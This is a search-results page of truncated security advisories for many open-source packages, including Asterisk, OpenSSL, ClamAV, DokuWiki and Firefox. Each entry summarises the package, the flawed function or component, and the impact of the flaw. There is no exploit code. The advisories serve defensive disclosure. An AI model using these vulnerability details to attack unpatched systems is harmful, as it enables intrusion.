3816 matches found
Asterisk: Multiple vulnerabilities
Background Asterisk is an open source implementation of a telephone private branch exchange PBX. Description Asterisk contains buffer overflows in channels/chanmgcp.c from the MGCP driver and in channels/chanskinny.c from the Skinny channel driver for Cisco SCCP phones. It also dangerously handle...
Cheese Tracker: Buffer Overflow
Background Cheese Tracker is a Qt-based portable Impulse Tracker clone, a music tracker for the CT, IT, XM and S3M file formats. Description Luigi Auriemma reported that the XM loader of Cheese Tracker contains a buffer overflow vulnerability in the loaderXM::loadintrumentinternal function from...
OpenSSL: Multiple vulnerabilities
Background OpenSSL is a toolkit implementing the Secure Sockets Layer, Transport Layer Security protocols and a general-purpose cryptography library. Description Tavis Ormandy and Will Drewry, both of the Google Security Team, discovered that the SSLgetsharedciphers function contains a buffer...
ClamAV: Multiple Vulnerabilities
Background ClamAV is a GPL virus scanner. Description Damian Put and an anonymous researcher reported a potential heap-based buffer overflow vulnerability in rebuildpe.c responsible for the rebuilding of an unpacked PE file, and a possible crash in chmunpack.c in the CHM unpacker. Impact By sendi...
Apache mod_tcl: Format string vulnerability
Background Apache modtcl is a TCL interpreting module for the Apache 2.x web server. Description Sparfell discovered format string errors in calls to the setvar function in tclcmds.c and tclcore.c. Impact A remote attacker could exploit the vulnerability to execute arbitrary code with the rights ...
libmusicbrainz: Multiple buffer overflows
Background libmusicbrainz is a client library used to access MusicBrainz music meta data. Description Luigi Auriemma reported a possible buffer overflow in the MBHttp::Download function of lib/http.cpp as well as several possible buffer overflows in lib/rdfparse.c. Impact A remote attacker could ...
Cscope: Multiple buffer overflows
Background Cscope is a developer's tool for browsing source code. Description Unchecked use of strcpy and scanf leads to several buffer overflows. Impact A user could be enticed to open a carefully crafted file which would allow the attacker to execute arbitrary code with the permissions of the...
Mozilla Network Security Service (NSS): RSA signature forgery
Background The Mozilla Network Security Service is a library implementing security features like SSL v.2/v.3, TLS, PKCS 5, PKCS 7, PKCS 11, PKCS 12, S/MIME and X.509 certificates. Description Daniel Bleichenbacher discovered that it might be possible to forge signatures signed by RSA keys with th...
Python: Buffer Overflow
Background Python is an interpreted, interactive, object-oriented, cross-platform programming language. Description Benjamin C. Wiley Sittler discovered a buffer overflow in Python's "repr" function when handling UTF-32/UCS-4 encoded strings. Impact If a Python application processes...
CAPI4Hylafax fax receiver: Execution of arbitrary code
Background CAPI4Hylafax makes it possible to send and receive faxes via CAPI and AVM Fritz!Cards. Description Lionel Elie Mamane discovered an error in c2faxrecv, which doesn't properly sanitize TSI strings when handling incoming calls. Impact A remote attacker can send null \0 and shell...
Seamonkey: Multiple vulnerabilities
Background The SeaMonkey project is a community effort to deliver production-quality releases of code derived from the application formerly known as 'Mozilla Application Suite'. Description A number of vulnerabilities have been found and fixed in Seamonkey. For details please consult the referenc...
ncompress: Buffer Underflow
Background ncompress is a suite of utilities to create and extract Lempel-Ziff-Welch LZW compressed archives. Description Tavis Ormandy of the Google Security Team discovered a static buffer underflow in ncompress. Impact An attacker could create a specially crafted LZW archive, that when...
Mozilla Thunderbird: Multiple vulnerabilities
Background The Mozilla Thunderbird mail client is a redesign of the Mozilla Mail component. Description A number of vulnerabilities have been found and fixed in Mozilla Thunderbird. For details please consult the references below. Impact The most severe vulnerabilities might lead to the execution...
Adobe Flash Player: Arbitrary code execution
Background The Adobe Flash Player is a renderer for Flash files - commonly used to provide interactive websites, digital experiences and mobile content. Description The Adobe Flash Player contains multiple unspecified vulnerabilities. Impact An attacker could entice a user to view a malicious Fla...
Opera: RSA signature forgery
Background Opera is a multi-platform web browser. Description Opera makes use of OpenSSL, which fails to correctly verify PKCS 1 v1.5 RSA signatures signed by a key with exponent 3. Some CAs in Opera's list of trusted signers are using root certificates with exponent 3. Impact An attacker could...
DokuWiki: Shell command injection and Denial of service
Background DokuWiki is a wiki targeted at developer teams, workgroups and small companies. It does not use a database backend. Description Input validation flaws have been discovered in the image handling of fetch.php if ImageMagick is used, which is not the default method. Impact A remote attack...
Mozilla Firefox: Multiple vulnerabilities
Background Mozilla Firefox is a redesign of the Mozilla Navigator component. The goal is to produce a cross-platform, stand-alone browser application. Description A number of vulnerabilities were found and fixed in Mozilla Firefox. For details please consult the references below. Impact The most...
OpenSSH: Denial of service
Background OpenSSH is a free suite of applications for the SSH protocol, developed and maintained by the OpenBSD project. Description Tavis Ormandy of the Google Security Team discovered a Denial of Service vulnerability in the SSH protocol version 1 CRC compensation attack detector. Impact A...
Tikiwiki: Arbitrary command execution
Background Tikiwiki is a web-based groupware and content management system, developed with PHP, ADOdb and Smarty. Description A vulnerability in jhot.php allows for an unrestricted file upload to the img/wiki/ directory. Additionally, an XSS exists in the highlight parameter of...
ImageMagick: Multiple Vulnerabilities
Background ImageMagick is a free software suite to manipulate, convert, and create many image formats. Description Tavis Ormandy of the Google Security Team discovered a stack and heap buffer overflow in the GIMP XCF Image decoder and multiple heap and integer overflows in the SUN bitmap decoder...
GnuTLS: RSA Signature Forgery
Background GnuTLS is an implementation of SSL 3.0 and TLS 1.0. Description verify.c fails to properly handle excess data in digestAlgorithm.parameters field while generating a hash when using an RSA key with exponent 3. RSA keys that use exponent 3 are commonplace. Impact Remote attackers could...
gzip: Multiple vulnerabilities
Background gzip, the GNU zip compression utility, is a free and patent unencumbered replacement for the standard compress utility. Description Tavis Ormandy of the Google Security Team has reported multiple vulnerabilities in gzip. A stack buffer modification vulnerability was discovered in the L...
Mailman: Multiple vulnerabilities
Background Mailman is a Python based mailing list server with an extensive web interface. Description Mailman fails to properly handle standards-breaking RFC 2231 formatted headers. Furthermore, Moritz Naumann discovered several XSS vulnerabilities and a log file injection. Impact An attacker cou...
BIND: Denial of service
Background ISC BIND is the Internet Systems Consortium implementation of the Domain Name System DNS protocol. Description Queries for SIG records will cause an assertion error if more than one SIG RRset is returned. Additionally, an INSIST failure can be triggered by sending multiple recursive...
DokuWiki: Arbitrary command execution
Background DokuWiki is a wiki targeted at developer teams, workgroups and small companies. It does not use a database backend. Description "rgod" discovered that DokuWiki doesn't sanitize the X-FORWARDED-FOR HTTP header, allowing the injection of arbitrary contents - such as PHP commands - into a...
LibXfont, monolithic X.org: Multiple integer overflows
Background libXfont is the X.Org Xfont library, some parts are based on the FreeType code base. Description Several integer overflows have been found in the CID font parser. Impact A remote attacker could exploit this vulnerability by enticing a user to load a malicious font file resulting in the...
FFmpeg: Buffer overflows
Background FFmpeg is a very fast video and audio converter. Description FFmpeg contains buffer overflows in the AVI processing code. Impact An attacker could trigger the buffer overflows by enticing a user to load a specially crafted AVI file in an application using the FFmpeg library. This might...
xine-lib: Buffer overflows
Background xine is a high performance, portable and reusable multimedia playback engine. xine-lib is xine's core engine. Description xine-lib contains buffer overflows in the processing of AVI. Additionally, xine-lib is vulnerable to a buffer overflow in the HTTP plugin xinepluginphttp.so via a...
AdPlug: Multiple vulnerabilities
Background AdPlug is a free, cross-platform, and hardware-independent AdLib sound player library. Description AdPlug is vulnerable to buffer and heap overflows when processing the following types of files: CFF, MTK, DMO, U6M, DTM, and S3M. Impact By enticing a user to load a specially crafted fil...
OpenSSL, AMD64 x86 emulation base libraries: RSA signature forgery
Background OpenSSL is a toolkit implementing the Secure Sockets Layer, Transport Layer Security protocols and a general-purpose cryptography library. The x86 emulation base libraries for AMD64 contain a vulnerable version of OpenSSL. Description Daniel Bleichenbacher discovered that it might be...
GTetrinet: Remote code execution
Background GTetrinet is a networked Tetris clone for GNOME 2. Description Michael Gehring has found that GTetrinet fails to properly handle array indexes. Impact An attacker can potentially execute arbitrary code by sending a negative number of players to the server. Workaround There is no known...
OpenTTD: Remote Denial of service
Background OpenTTD is a clone of Transport Tycoon Deluxe. Description OpenTTD is vulnerable to a Denial of Service attack due to a flaw in the manner the game server handles errors in command packets. Impact An authenticated attacker can cause a Denial of Service by sending an invalid error numbe...
Streamripper: Multiple remote buffer overflows
Background Streamripper extracts and records individual MP3 file tracks from SHOUTcast streams. Description Ulf Harnhammar, from the Debian Security Audit Project, has found that Streamripper is vulnerable to multiple stack based buffer overflows caused by improper bounds checking when processing...
LibXfont: Multiple integer overflows
Background libXfont is the X.Org Xfont library, some parts are based on the FreeType code base. Description Several integer overflows have been found in the PCF font parser. Impact A local attacker could possibly execute arbitrary code or crash the Xserver by enticing a user to load a specially...
PHP: Arbitary code execution
Background PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. Description The sscanf PHP function contains an array boundary error that can be exploited to dereference a null pointer. This can possibly allow the...
Wireshark: Multiple vulnerabilities
Background Wireshark is a feature-rich network protocol analyzer. Description The following vulnerabilities have been discovered in Wireshark. Firstly, if the IPsec ESP parser is used it is susceptible to off-by-one errors, this parser is disabled by default; secondly, the SCSI dissector is...
Motor: Execution of arbitrary code
Background Motor is a text mode based programming environment for Linux, with a syntax highlighting feature, project manager, makefile generator, gcc and gdb front-end, and CVS integration. Description In November 2005, Zone-H Research reported a boundary error in the ktools library in the...
X.org and some X.org libraries: Local privilege escalations
Background X.org is an implementation of the X Window System. Description Several X.org libraries and X.org itself contain system calls to setuid functions, without checking their result. Impact Local users could deliberately exceed their assigned resource limits and elevate their privileges afte...
AlsaPlayer: Multiple buffer overflows
Background AlsaPlayer is a heavily multithreaded PCM player that tries to utilize ALSA utilities and drivers. As of June 2004, the project is inactive. Description AlsaPlayer contains three buffer overflows: in the function that handles the HTTP connections, the GTK interface, and the CDDB queryi...
Heartbeat: Denial of service
Background Heartbeat is a component of the High-Availability Linux project. It is used to perform death-of-node detection, communications and cluster management. Description Yan Rong Ge discovered that the peelnetstring function in clnetstring.c does not validate the "length" parameter of user...
fbida: Arbitrary command execution
Background fbida is a collection of image viewers and editors for the framebuffer console and X11. fbgs is a PostScript and PDF viewer for the linux framebuffer console. Description Toth Andras has discovered a typographic mistake in the "fbgs" script, shipped with fbida if the "fbcon" and "pdf"...
Heimdal: Multiple local privilege escalation vulnerabilities
Background Heimdal is a free implementation of Kerberos 5. Description The ftpd and rcp applications provided by Heimdal fail to check the return value of calls to seteuid. Impact A local attacker could exploit this vulnerability to execute arbitrary code with elevated privileges. Workaround Ther...
Ruby on Rails: Several vulnerabilities
Background Ruby on Rails is an open-source web framework. Description The Ruby on Rails developers have corrected some weaknesses in actioncontroller/, relative to the handling of the user input and the LOADPATH variable. A remote attacker could inject arbitrary entries into the LOADPATH variable...
Net::Server: Format string vulnerability
Background Net::Server is an extensible, generic Perl server engine. It is used by several Perl applications like Postgrey. Description The log function of Net::Server does not handle format string specifiers properly before they are sent to syslog. Impact By sending a specially crafted datastrea...
WordPress: Privilege escalation
Background WordPress is a PHP and MySQL based multiuser blogging system. Description The WordPress developers have confirmed a vulnerability in capability checking for plugins. Impact By exploiting a flaw, a user can circumvent WordPress access restrictions when using plugins. The actual impact...
libwmf: Buffer overflow vulnerability
Background libwmf is a library for reading and converting vector images in Microsoft's native Windows Metafile Format WMF. Description infamous41md discovered that libwmf fails to do proper bounds checking on the MaxRecordSize variable in the WMF file header. This could lead to an head-based buff...
Warzone 2100 Resurrection: Multiple buffer overflows
Background Warzone 2100 Resurrection is a real-time strategy game, developed by Pumpkin Studios and published by Eidos Interactive. Description Luigi Auriemma discovered two buffer overflow vulnerabilities in Warzone 2100 Resurrection. The recvTextMessage function of the Warzone 2100 Resurrection...
MIT Kerberos 5: Multiple local privilege escalation vulnerabilities
Background MIT Kerberos 5 is a suite of applications that implement the Kerberos network protocol. It is designed to provide strong authentication for client/server applications by using secret-key cryptography. Description Unchecked calls to setuid in krshd and v4rcp, as well as unchecked calls ...
DUMB: Heap buffer overflow
Background DUMB Dynamic Universal Music Bibliotheque is an IT, XM, S3M and MOD player library. Description Luigi Auriemma found a heap-based buffer overflow in the itreadenvelope function which reads the envelope values for volume, pan and pitch of the instruments referenced in a ".it" Impulse...
ClamAV: Heap buffer overflow
Background ClamAV is a GPL virus scanner. Description Damian Put has discovered a boundary error in the pefromupx function used by the UPX extraction module, which unpacks PE Windows executable files. Both the "clamscan" command-line utility and the "clamd" daemon are affected. Impact By sending ...